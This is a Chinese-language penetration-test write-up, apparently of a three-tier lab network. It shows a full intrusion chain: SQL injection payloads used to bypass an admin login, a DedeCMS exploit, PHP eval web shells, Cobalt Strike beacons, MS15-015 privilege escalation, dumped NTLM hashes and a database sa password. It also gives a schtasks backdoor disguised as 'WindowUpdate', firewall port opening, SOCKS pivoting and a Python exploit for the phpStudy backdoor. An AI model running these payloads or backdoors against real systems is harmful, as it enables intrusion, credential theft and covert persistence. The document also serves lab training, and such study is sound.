image.png

第一层

一、信息收集

测试站点:www.cc.123.com

1、domian

使用工具暴力枚举子域名
Pasted image 20210527165908.png
www.cc.123.com
ww2.cc123.com
new.cc123.com

2、IP_Prot

使用rustscan扫描端口

  1. Open 192.168.0.134:21 -- ftp
  2. Open 192.168.0.134:53
  3. Open 192.168.0.134:80 -- iis
  4. Open 192.168.0.134:135
  5. Open 192.168.0.134:999 -- phpmyadmin
  6. Open 192.168.0.134:3389 -- rdp
  7. Open 192.168.0.134:6588 -- hws
  8. Open 192.168.0.134:49155
  9. Open 192.168.0.134:49156

二、漏洞测试

1、ww2.cc123.com

根据awvs扫描结果发现管理员登录页面
Pasted image 20210527180701.png

1、SQL注入-1

Sqlmap一把梭发现管理员登录页面存在sql注入

  1. ---
  2. Parameter: username (POST)
  3. Type: stacked queries
  4. Title: Microsoft SQL Server/Sybase stacked queries (comment)
  5. Payload: __VIEWSTATE=/wEPDwUJMzMyMjA3OTM4ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUMSW1hZ2VCdXR0b24xqZOLn0fzcRfu7EbEDKHoyvx3obU94MS6VAUneBJOkZ0=&__VIEWSTATEGENERATOR=82312306&__EVENTVALIDATION=/wEdAAc5ZYESCKH66fJHGLAe4TLCKhoCyVdJtLIis5AgYZ/RYe4sciJO3Hoc68xTFtZGQEgOC/FhCJvlJJDlu9nTwjvq6ZACrx5RZnllKSerU+IuKh2nXP6dhZn6mKtmTGNHd3MtizSQ3FDPz4jhBkvaNoE1AM2SGgwYOgU2pIFlxhELWg1KHCIX5swqFeVF8xxNL/g=&username=admin';WAITFOR DELAY '0:0:5'--&password=123456&safecode=t80p&ImageButton1.x=32&ImageButton1.y=13&TextBox2=
  6. ---

尝试利用SQL注入漏洞绕过管理员登录
Pasted image 20210527181554.png
成功进入后台
Pasted image 20210527181629.png

2、SQL注入-2

进入管理员后台后Xray扫描到的第一个注入点,资讯列表功能

  1. [Vuln: sqldet]
  2. Target "http://ww2.cc123.com/admin/aboutlist.aspx?pid=6"
  3. VulnType "error-based/default"
  4. Payload "convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1157827142')))"
  5. Position "query"
  6. ParamKey "pid"
  7. ParamValue "convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1157827142')))"
  8. type "heuristic"
  9. title "convert function error based case"

3、SQL注入-3

进入管理员后台后Xray扫描到的第二个注入点,编辑资讯功能

  1. [Vuln: sqldet]
  2. Target "http://ww2.cc123.com/admin/newsadd.aspx?id=539&pid=45"
  3. VulnType "blind-based/default"
  4. Payload "539/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/"
  5. Position "query"
  6. ParamKey "id"
  7. ParamValue "539/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/"
  8. std_dev "25"
  9. sleep_time "2000"
  10. p_time "7"
  11. n_time "2007"
  12. stat "{\"normal\":{\"samples\":[8,13,22,82,29,8],\"avg\":27,\"std_dev\":25.729360660537214,\"sleep_time\":2},\"sleep_0_time\":7,\"quick_check\":{\"samples\":[2007],\"sleep\":2},\"verify\":{\"samples\":[3009,3004,3011],\"sleep\":3}}"
  13. title "Generic SQL Server time based case [number]"
  14. type "time_based"
  15. avg_time "27

5、物理路径泄露

在网站基本信息设置功能上传图片的时候报错

  1. ## C:\\HwsHostMaster\\wwwroot\\ww2cc123\_55m39g\\web\\admin\\UpImg\\20210527064605.gif

Pasted image 20210527184834.png
Pasted image 20210527184853.png

6、SQLmap跑出的网络配置

  1. command standard output:
  2. ---
  3. Windows IP 配置
  4. 以太网适配器 本地连接 2:
  5. 连接特定的 DNS 后缀 . . . . . . . :
  6. IPv4 地址 . . . . . . . . . . . . : 10.10.1.128
  7. 子网掩码 . . . . . . . . . . . . : 255.255.255.0
  8. 默认网关. . . . . . . . . . . . . :
  9. 以太网适配器 本地连接:
  10. 连接特定的 DNS 后缀 . . . . . . . : localdomain
  11. 本地链接 IPv6 地址. . . . . . . . : fe80::ec7d:88c4:723a:e954
  12. IPv4 地址 . . . . . . . . . . . . : 10.10.10.136
  13. 子网掩码 . . . . . . . . . . . . : 255.255.255.0
  14. 默认网关. . . . . . . . . . . . . :
  15. ---

根据IP信息判断,这台主机不是主站(www.cc123.com )的主机,使用库站分离的结构且不出网

2、new.cc123.com

根据目录扫描结果发现这个cms是dedecms
Pasted image 20210527201017.png
管理页面:http://new.cc123.com/dede/
用户页面:http://new.cc123.com/member/
查看当前网站版本是否存在历史漏洞

  1. http://new.cc123.com/data/admin/ver.txt
  2. > 20150618

1、SQL注入

使用月师傅给的Exp攻击
最后跑出管理员密码为admin7788

2、写入一句话

Pasted image 20210528110453.png
Pasted image 20210528110538.png
上传成功但无法执行命令
Pasted image 20210528110615.png
上传大马以及可写目录检测
Pasted image 20210528110801.png

3、CS上线

新建监听器
image.png
生成木马
image.png
根据啊D小工具扫描出可写可执行目录,上传木马到该目录
image.png

  1. c:\windows\debug\WIA\

image.png
使用大马执行木马
image.png
成功上线
image.png

4、查看系统信息

image.png
image.png

  1. 主机名: WIN-KALKEMT3JMA
  2. OS 名称: Microsoft Windows Web Server 2008 R2
  3. OS 版本: 6.1.7601 Service Pack 1 Build 7601
  4. OS 制造商: Microsoft Corporation
  5. OS 配置: 独立服务器
  6. OS 构件类型: Multiprocessor Free
  7. 注册的所有人: Windows 用户
  8. 注册的组织:
  9. 产品 ID: 00500-001-0000635-84364
  10. 初始安装日期: 2020/4/16, 19:46:53
  11. 系统启动时间: 2020/4/19, 17:51:31
  12. 系统制造商: VMware, Inc.
  13. 系统型号: VMware Virtual Platform
  14. 系统类型: x64-based PC
  15. 处理器: 安装了 2 个处理器。
  16. [01]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3408 Mhz
  17. [02]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3408 Mhz
  18. BIOS 版本: Phoenix Technologies LTD 6.00, 2017/5/19
  19. Windows 目录: C:\Windows
  20. 系统目录: C:\Windows\system32
  21. 启动设备: \Device\HarddiskVolume1
  22. 系统区域设置: zh-cn;中文(中国)
  23. 输入法区域设置: zh-cn;中文(中国)
  24. 时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
  25. 物理内存总量: 2,047 MB
  26. 可用的物理内存: 815 MB
  27. 虚拟内存: 最大值: 4,095 MB
  28. 虚拟内存: 可用: 2,431 MB
  29. 虚拟内存: 使用中: 1,664 MB
  30. 页面文件位置: C:\pagefile.sys
  31. 域: WORKGROUP
  32. 登录服务器: 暂缺
  33. 修补程序: 安装了 1 个修补程序。
  34. [01]: KB976902
  35. 网卡: 安装了 2 NIC
  36. [01]: Intel(R) PRO/1000 MT Network Connection
  37. 连接名: 本地连接
  38. 启用 DHCP:
  39. IP 地址
  40. [01]: 192.168.0.134
  41. [02]: fe80::c1e2:d216:9dad:969b
  42. [02]: Intel(R) PRO/1000 MT Network Connection
  43. 连接名: 本地连接 2
  44. 启用 DHCP:
  45. IP 地址
  46. [01]: 10.10.10.135
  47. [02]: fe80::2c1c:e958:d8c2:1189

发现就打了一个补丁 [01]: KB976902

4、使用MS15-015提权
  1. MS15-015  [KB3031432]  [Kernel Driver]  (Win7/8/8.1/2012/RT/2012 R2/2008 R2)
  2. https://github.com/SecWiki/windows-kernel-exploits

image.png

成功提权
image.png

三、据点占领

1、使用SMB协议进行移动

新建一个SMB监听器
image.png
选中system用户的会话并点击添加会话选中B_SMB
image.png
image.png
image.png

2、进程迁移

选择会话-> 进程列表 -> 选择一个进程(如果是管理员会话记得选中是管理员权限运行的程序) -> 选中中转监听器 -> 点击注入(inject)
image.png

2、哈希获取

image.png

  1. Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2:::
  2. cc123:1005:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::
  3. Guest:501:aad3b435b51404eeaad3b435b51404ee:e35c2b2d95f6ae63b75dbbff5195accb:::
  4. huweishen542147:1004:aad3b435b51404eeaad3b435b51404ee:c76eea2615348c5228f7027d3ccab02d:::
  5. MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:6a75a75e4cfd3cf00faf743e17e90a53:::
  6. newcc123:1007:aad3b435b51404eeaad3b435b51404ee:97824315153b4dd665d6c688f446ebf1:::
  7. PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:a14b615c584d6b043f42f1cfab9779cd:::
  8. ww2cc123:1008:aad3b435b51404eeaad3b435b51404ee:adadf2dd832421c26a96705fd09a32bd:::

3、持久化后门植入

将后门修改名字为一个和系统程序差不多的程序名然后上传(忽略我的Lv_1)
image.png
image.png
image.png
使用计划任务植入后门

  1. shell schtasks /create /tn "WindowUpdate" /tr "C:\Windows\SysWOW64\inetsrv\Lv1_WindowUpdate.exe" /ru SYSTEM /sc onstart
  2. shell schtasks /run /tn WindowUpdate
  3. shell schtasks /query /tn WindowUpdate //若是查询失败则要修改字符集 chcp 437
  4. shell schtasks /delete /tn WindowUpdate /F // 删除

image.png
计划任务木马成功上线
image.png

第二层

一、信息收集

使用CS自带的端口扫描工具扫描发现这个网段还存在另一台主机
image.pngimage.png

  1. (ARP) Target '10.10.10.135' is alive. 00-0C-29-84-A4-05
  2. (ARP) Target '10.10.10.134' is alive. 00-0C-29-87-89-82

image.png
仔细一看发现是第一层ww2.cc123.com连接的数据库服务器

二、漏洞利用

尝试寻找ww2cc123中的数据库连接语句,在ww2的网站根目录中的web.conifg中的数据库连接字符串(.net/asp网站的数据库配置文件都喜欢叫web.Config)

  1. C:\HwsHostMaster\wwwroot\ww2cc123_55m39g\web\web.Config

image.png

打开发现连接字符串

  1. server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123..

Pasted image 20210528171445.png使用大马连接image.png新建第二层CS转发器
image.pngimage.png
生成第二层CS木马
image.png
查看当前大马权限
image.png
发现是系统权限了,那就随便写到一个目录吧
image.png
使用大马执行CS木马
image.png
执行后发现进程执行了但是没有返回会话,突然想到是不是web服务器启用了防火墙
查询防火墙状态

  1. shell netsh firewall show state

image.png
使用命令放行转发器的端口

  1. netsh firewall set portopening TCP 23111 ENABLE

image.png
再次运行木马成功上线
image.png

三、据点占领

1、哈希获取

  1. Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::
  2. Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

2、持久化后门植入

目前还不知道怎么在第二层网络植入后门,待填坑

第三层

一、信息收集

使用CS自带端口扫描发现新主机,且开放了80端口

  1. [+] received output:
  2. (ARP) Target '10.10.1.128' is alive. 00-0C-29-87-89-8C
  3. (ARP) Target '10.10.1.129' is alive. 00-0C-29-99-E2-1D
  4. [+] received output:
  5. 10.10.1.129:80

image.png

使用第二层会话开启socks代理进行网页访问
image.pngimage.png

使用浏览器插件设置浏览器代理访问网站
Pasted image 20210528195354.png
或者使用SocksCap
Pasted image 20210528195434.png
访问网站后发现这台主机装了一个phpstudy2014Pasted image 20210528195550.png

二、漏洞利用

1、上传一句话

从月师傅那里得知phpstudy以前是存在后门的
可以根据网上的一篇复现文章进行漏洞利用:https://blog.csdn.net/qq_38484285/article/details/101381883

先使用代理工具代理cmd到同一个网络
image.png

  1. #conding:utf-8
  2. import requests
  3. import sys
  4. import base64
  5. shell = "system('"+sys.argv[1]+"');"
  6. shell_base64 = base64.b64encode(shell.encode('utf-8'))
  7. header={'Accept-charset':shell_base64,'Accept-Encoding':'gzip,deflate'}
  8. def exploit(url):
  9. html = requests.get(url=url,headers=header).text
  10. return html
  11. url = "http://10.10.1.129/"
  12. exploit(url)

使用月师傅给的exp写入一句话

  1. python3 phpstudy.py "echo ^<?php @eval($_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"

image.png

设置蚁剑代理
image.png
使用蚁剑连接
Pasted image 20210528223103.png
查看权限,已经是系统权限所以免去了提权的操作
Pasted image 20210528223331.png

2、上传CS木马

添加CS第三层转发器
image.png
生成木马
image.png
上传并执行
image.png
成功上线
image.png

三、据点占领

1、哈希获取

  1. Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::
  2. Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

攻击拓扑

image.png
image.png
image.png